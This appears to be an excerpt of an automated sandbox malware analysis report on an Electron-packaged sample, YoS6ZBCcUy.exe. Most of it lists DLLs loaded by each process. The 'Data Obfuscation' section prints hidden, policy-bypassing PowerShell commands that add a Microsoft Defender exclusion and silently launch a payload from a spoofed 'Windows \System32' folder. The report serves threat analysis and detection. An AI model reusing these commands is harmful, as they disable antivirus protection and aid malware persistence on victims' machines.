Source: C:\Windows \System32\winSAT.exeSection loaded: d3d11.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d10core.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: d3d11.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: version.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: ntmarta.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: windows.storage.dll
Source: C:\Windows \System32\winSAT.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: snmpapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: odbc32.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: msftedit.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: globinputhost.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dataexchange.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: d3d11.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dcomp.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: inetmib1.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windows.ui.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: npmproxy.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dbgcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exeSection loaded: mf.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq NSIS.exe" /FO csv
Source: MyElectronApp.lnk.16.dr LNK file: ..\..\..\..\..\..\Local\Programs\NSIS\NSIS.exe
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\MyElectronApp\Bginfo.exe Window detected: Number of UI elements: 15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\YoS6ZBCcUy.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\31e24c48-f042-5745-a165-04e896e763b7
Source: YoS6ZBCcUy.exe Static file information: File size 84269376 > 1048576
Source: YoS6ZBCcUy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb<: source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2147033936.0000000004B82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ffmpeg.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2082003478.0000000004758000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb,q source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll14\x64\Release\Dll14.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vulkan-1.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2197462818.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2147240320.0000000004B70000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2074996101.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2077198025.0000000005DA0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000002.2201242233.0000000004B54000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2075174807.0000000004970000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: YoS6ZBCcUy.exe, 00000000.00000003.2080858985.0000000004759000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: electron.exe.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: libGLESv2.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2086278028.0000000004753000.00000004.00000020.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.1964331752.00000000061A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\main\source\repos\Dll15\Release\Dll15.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2146785438.0000000004751000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vk_swiftshader.dll.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2143596568.000000000475E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\s\Win32\Release\BGInfo.pdb source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\SysWOW64\tasklist.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; $BginfoPath = Join-Path $TargetPath 'Bginfo.exe'; Start-Process -FilePath $BginfoPath -ArgumentList '/NOLICPROMPT /timer:300' -WorkingDirectory $TargetPath -WindowStyle Hidden; }"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -Filepath 'C:\Windows \System32\winSAT.exe' -WindowStyle Hidden
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& {$UserProfile = [Environment]::GetFolderPath('UserProfile'); $TargetPath = Join-Path $UserProfile 'AppData\Roaming\MyElectronApp'; Add-MpPreference -ExclusionPath $TargetPath; }"
Source: C:\Windows \System32\winSAT.exeCode function: 19_2_00007FF780F9A960 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,19_2_00007FF780F9A960
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe.0.drStatic PE information: section name: .gxfg
Source: NSIS.exe.0.drStatic PE information: section name: .retplne
Source: NSIS.exe.0.drStatic PE information: section name: .rodata
Source: NSIS.exe.0.drStatic PE information: section name: CPADinfo
Source: NSIS.exe.0.drStatic PE information: section name: LZMADEC
Source: NSIS.exe.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe.0.drStatic PE information: section name: malloc_h
Source: NSIS.exe.0.drStatic PE information: section name: prot
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.0.drStatic PE information: section name: .retplne
Source: libEGL.dll0.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe0.0.drStatic PE information: section name: .gxfg
Source: NSIS.exe0.0.drStatic PE information: section name: .retplne
Source: NSIS.exe0.0.drStatic PE information: section name: .rodata
Source: NSIS.exe0.0.drStatic PE information: section name: CPADinfo
Source: NSIS.exe0.0.drStatic PE information: section name: LZMADEC
Source: NSIS.exe0.0.drStatic PE information: section name: _RDATA
Source: NSIS.exe0.0.drStatic PE information: section name: malloc_h
Source: NSIS.exe0.0.drStatic PE information: section name: prot
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: winSAT.exe.10.drStatic PE information: section name: PAGELK
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .00cfg
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .gxfg
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .retplne
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: _RDATA
Source: version.dll.10.drStatic PE information: section name: .00cfg
Source: version.dll.10.drStatic PE information: section name: .gxfg
Source: version.dll.10.drStatic PE information: section name: .retplne
Source: version.dll.10.drStatic PE information: section name: _RDATA
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .00cfg
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .gxfg
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .retplne
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: _RDATA
Source: 039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll.10.drStatic PE information: section name: .00cfg
Source: version.dll0.10.drStatic PE information: section name: .00cfg
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .00cfg
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .gxfg
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .retplne
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: _RDATA
Source: aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll.37.drStatic PE information: section name: .00cfg
Source: 234d6ba4-850d-4c80-8096-274aff2a3936.tmp.dll.10.drStatic PE information: section name: .text entropy: 6.82926849072032
Source: version.dll.10.drStatic PE information: section name: .text entropy: 6.82926849072032
Source: 55211371-e4e4-4315-9751-4ed29e5502da.tmp.dll.10.drStatic PE information: section name: .text entropy: 6.826347079300051
Source: 039a5ffc-3e3b-416f-b75e-1c58b05c238b.tmp.dll.10.drStatic PE information: section name: .text entropy: 7.098417691970752
Source: version.dll0.10.drStatic PE information: section name: .text entropy: 7.098417691970752
Source: b1dc575e-7958-4cdc-a4c8-223d21682d6f.tmp.dll.37.drStatic PE information: section name: .text entropy: 6.82926849072032
Source: aa6ee5f9-f11d-4a3b-adf5-0dc4d4da48f4.tmp.dll.37.drStatic PE information: section name: .text entropy: 7.098417691970752

Persistence and Installation Behavior

